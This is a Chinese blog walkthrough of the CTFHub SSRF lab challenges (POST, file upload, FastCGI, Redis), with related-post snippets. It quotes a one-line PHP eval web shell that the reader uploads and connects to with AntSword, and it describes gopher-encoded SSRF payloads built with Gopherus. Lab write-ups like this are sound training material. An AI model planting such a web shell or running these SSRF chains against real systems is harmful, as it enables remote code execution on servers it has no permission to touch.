ctfhub-ssrf通关攻略(二)

原创 已于 2025-03-09 20:33:31 修改 · 211 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#靶场 #ctfhub

于 2025-03-09 20:31:00 首次发布

POST请求

?url=http://127.0.0.1/flag.php

右键查看网页源代码

把源代码复制粘贴在输入框后回车,使用bp抓包

修改格式如下

对代码进行编码

把编码后的粘贴到记事本,把全部%0a替换为%0d%0a,结尾再加一个%0d%0a

再把代码进行一次编码后粘贴在搜索框后

把://和:改回

访问后即可得到

上传文件

查看flag.php文件

<?php @eval($_POST[cmd]);?>

编辑木马保存在1.php文件

右键查看源代码--编辑上传按钮

把木马文件上传

抓包后同样修改代码

对修改后的代码进行编码,编码后粘贴在记事本如图进行全部替换

替换后再进行一次编码,把编码过的粘贴在网页后即可得到

FastCGI协议

使用Gopherus-master


使用蚁剑上传木马后连接

在目录下找到

Redis协议

输入指令

编码转换

使用工具连接

根目录下找到

ctfhub-web-ssrf通关攻略
qq_64470109的博客
03-09 1262
题目提示我们访问本机的flag.php,那我们便去访问一下OK,出来结果。
ctfhub-web-SSRF通关攻略
2401_82451607的博客
08-27 2463
ctfhub-web-SSRF通关攻略
CTFHub-ssrf通关攻略
muxixin的博客
03-09 438
来到题目输入本机ip,得到flag。
CTFHub技能树Web-SSRF通关攻略
duanjiaxu6666的博客
07-17 1008
浏览器访问gopher一次编码,等待时间过长,直接访问shell.php看是否生成,进入木马地址,逐级寻找flag,得到flag。进入题目,url访问flag.php,没有这个文件,url访问index.php页面被解析,有这个文件,启动gopher程序。url访问flag,得到回显禁止127,172的开头访问,尝试localhost进行访问,页面得到flag。url访问flag,直接在url后面输入127.0.0.1/flag.php,得到flag。
CTFHub-SSRF过关攻略
shw_yzh的博客
08-27 1293
CTFHub-SSRF过关攻略
CTFHub-web-ssrf通关攻略
ljh123321ljh的博客
03-09 761
(8).将次编码后的数据复制到如下界面,并将gopher之后和80之前的'%253A'替换为':',然后访问,出现如下页面,得到flag。(8).并将gopher之后和80之前的'%253A'替换为':',然后访问,出现如下页面,得到flag。(3).得到正确端口为,访问?(1).访问http://127.0.0.1/flag.php,出现如下界面。(1).访问http://127.0.0.1/flag.php,出现如下界面。(2)输入http://localhost/flag.php得到flag。
CTFHUB-SSRF-FastCGI协议
weixin_68416970的博客
07-02 724
CTFHUB技能树、SSRF、FastCGI协议的通关教程
CTFHUB-SSRF-Redis协议
weixin_68416970的博客
07-03 614
CTFHUB技能树、SSRF、Redis协议的通关教程
CTFHUB-SSRF-302跳转 Bypass
weixin_68416970的博客
07-06 729
CTFHUB技能树、SSRF、302跳转 Bypass的通关教程
ctfhub-ssrf通关攻略
2403_87610673的博客
03-06 191
根据提示发现127-172被禁了,但是又要访问127所以使用localhost绕过。根据题目提示访问127.0.0.1/flag.php flag就出来了。根据提示发现端口在8000-9000中,我们抓包burp测一下。根据题目提示读取web目录下的flag.php。根据提示发现这关可以使用localhost绕过。根据题目附件找到这个网站进行ip重绑定。flag在网页源代码中。这关根据提示必须包含的内容+@绕过。成功在8943端口发现flag。6.302 跳转By pass。flag在网页源代码中。
CTFHub技能树点亮之路-SSRF通关攻略(三)
m0_66808441的博客
03-09 814
可先通过尝试查看phpinfo()判断木马文件是否上传成功。继续向父级查看,直到在根目录下发现的flag文件。可以发现此处定义了一个表单,提交方式为Post。出现了一个文本框,F12查看页面源代码。输入框的name为下方注释的key值。未发现flag,查看上一级。
CTFHUB-SSRF-上传文件
weixin_68416970的博客
07-01 980
CTFHUB技能树、SSRF、上传文件的通关教程
基于SpringBoot后端框架与Vue前端框架构建的现代化医院在线挂号预约管理系统_包含患者端与医生端及管理员后台的综合性医疗服务平台_实现患者在线注册登录查询医生信息选择科室与.zip
12-25
基于SpringBoot后端框架与Vue前端框架构建的现代化医院在线挂号预约管理系统_包含患者端与医生端及管理员后台的综合性医疗服务平台_实现患者在线注册登录查询医生信息选择科室与.zip
基于PaddleNLP深度学习框架构建的细粒度属性级情感分析Web应用系统_该项目是一个集成了评论观点抽取与属性级情感分析功能的在线服务平台采用前后端分离架构后端基于FastA.zip
12-25
基于PaddleNLP深度学习框架构建的细粒度属性级情感分析Web应用系统_该项目是一个集成了评论观点抽取与属性级情感分析功能的在线服务平台采用前后端分离架构后端基于FastA.zip
这是一个基于Vuejs框架构建的极简后台管理系统前端模板项目_它集成了ElementUI组件库提供丰富的UI界面元素_采用axios进行HTTP请求处理_整合了iconfont图.zip
12-25
这是一个基于Vuejs框架构建的极简后台管理系统前端模板项目_它集成了ElementUI组件库提供丰富的UI界面元素_采用axios进行HTTP请求处理_整合了iconfont图.zip
yygh-site是一个基于Nuxtjs框架构建的现代化医院预约挂号前端网站项目_该项目专注于提供用户友好的医院科室查询医生信息展示在线预约挂号个人中心管理及健康资讯浏览等.zip
12-25
yygh-site是一个基于Nuxtjs框架构建的现代化医院预约挂号前端网站项目_该项目专注于提供用户友好的医院科室查询医生信息展示在线预约挂号个人中心管理及健康资讯浏览等.zip
【创建计算机断层扫描金属制品】创建的计算机断层扫描金属伪影、该模拟为平行束CT(Matlab代码实现)
最新发布
12-25
【创建计算机断层扫描金属制品】创建的计算机断层扫描金属伪影、该模拟为平行束CT(Matlab代码实现)内容概要:本文主要介绍了一个基于Matlab代码实现的平行束计算机断层扫描(CT)系统中金属伪影的创建与模拟方法。通过构建含有金属物体的仿真模型,利用平行束CT成像原理进行投影和重建,进而生成包含金属伪影的CT图像。该模拟有助于研究金属伪影的形成机制及其对医学影像质量的影响,并为后续开发有效的伪影校正算法提供基础技术支持。文中强调了科研过程中逻辑严谨性与创新思维的重要性,并提供了丰富的Matlab仿真资源支持多领域研究。; 适合人群:具备一定Matlab编程基础,从事医学成像、图像处理或相关工程与科研工作的研究人员及研究生;; 使用场景及目标:①用于理解和模拟CT成像中金属伪影的产生过程;②为医学图像去伪影算法的研究与验证提供仿真数据支持;③辅助教学与科研中对CT成像原理的深入探讨; 阅读建议:建议读者结合提供的Matlab代码进行实践操作,逐步调试与可视化各成像环节,加深对投影、重建及伪影形成机制的理解,并鼓励在此基础上拓展伪影校正算法的研究。
基于YOLO11改进的面向复杂交通场景的高精度地平线检测网络RoadHoriNet通过透视变换与包围框裁剪数据增强钻石空间参数化稳定消失点学习感受野注意力卷积与动态上采样提升.zip
12-25
基于YOLO11改进的面向复杂交通场景的高精度地平线检测网络RoadHoriNet通过透视变换与包围框裁剪数据增强钻石空间参数化稳定消失点学习感受野注意力卷积与动态上采样提升.zip
基于UNet与DeepLabV3架构的汽车道路多类别高精度语义分割与目标检测一体化深度学习模型训练与部署项目_该项目专注于利用包含26个类别共计9000张高质量标注图像的汽车道路.zip
12-25
基于UNet与DeepLabV3架构的汽车道路多类别高精度语义分割与目标检测一体化深度学习模型训练与部署项目_该项目专注于利用包含26个类别共计9000张高质量标注图像的汽车道路.zip
CTFHub-Web ssrf post请求
01-08
### CTFHub Web平台中的SSRF漏洞利用Post请求 #### SSRF漏洞概述 服务器端请求伪造(Server-Side Request Forgery, SSRF)是一种攻击方式,其中攻击者能够诱使服务器向任意URL发出HTTP请求。这种攻击可能让攻击者绕过防火墙和其他安全控制措施,访问内部网络资源或敏感数据。 当应用程序允许用户输入并将其作为部分构建对外部服务的请求时,如果没有适当验证这些输入,则可能存在SSRF风险[^1]。 #### Post请求下的SSRF漏洞利用实例 在某些情况下,Web应用会接受来自用户的POST参数,并基于此创建新的HTTP POST请求到指定的目标位置。假设有一个接口`/api/fetchData`接收两个字段:一个是目标网址(`url`);另一个是要发送的数据体(`data`)。如果这个API不对传入的`url`做任何校验就直接发起请求的话,那么它就是一个潜在的SSRF入口点[^3]。 例如,在CTF场景下,可以通过构造如下表单提交来测试是否存在此类漏洞: ```html <form action="http://example.com/api/fetchData" method="POST"> <input type="hidden" name="url" value="http://internal-service/admin"/> <textarea name="data">{"action":"listUsers"}</textarea> <button>Submit</button> </form> ``` 一旦成功触发该行为,服务器就会尝试连接至所提供的内部路径并向其传递JSON负载,这可能导致未授权的信息泄露或其他更严重的后果。 #### 防御策略建议 为了防止上述情况的发生,应该采取以下几种方法加强防护: - **严格验证所有外部可控变量**:确保每一个由客户端提供的值都被仔细审查,特别是那些用来组成最终调用链路的部分。 - **采用白名单模式限定可到达的目的地集合**:仅限于已知可信站点列表内的链接才被准许处理,拒绝一切超出范围之外的选择。 - **实施细粒度的身份认证与权限管理**:即使是在受控环境之内也要遵循最小特权原则,即只有真正必要的时候才能给予特定实体执行高危动作的权利。 另外值得注意的是,除了基本防范手段外还可以考虑引入诸如代理层之类的技术方案进一步隔离内外网之间的交互过程,减少暴露面的同时也增加了中间件层面的安全保障能力[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值